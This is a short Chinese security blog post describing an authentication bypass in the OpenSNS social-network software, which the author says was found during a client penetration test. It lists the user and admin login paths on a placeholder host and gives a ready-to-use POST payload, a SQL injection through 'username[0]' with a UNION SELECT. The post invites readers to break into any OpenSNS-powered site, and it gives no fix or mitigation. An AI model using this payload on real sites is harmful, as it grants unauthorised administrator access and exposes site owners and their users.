JAVA安全网JAVA安全网

生命不息,折腾不止。
--JAVA人自留地。

opensns秒进后台

这个是在给客户做渗透测试的时候发现的。期间感谢雨神

powered by opensns 随便日

秒进后台有2处地方:

一个是普通用户登录,一处后台管理登录(默认)

http://a.com/index.php?s=/ucenter/member/login.html 普通用户登录

http://a.com/index.php?s=/admin/public/login.html 后台登录

playload: POST

username[0]==1 UNION SELECT 1,2,'',4,5,6,7,8,9,10,11,12#IN&password=
未经允许不得转载:JAVA安全网 » opensns秒进后台

评论 3

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址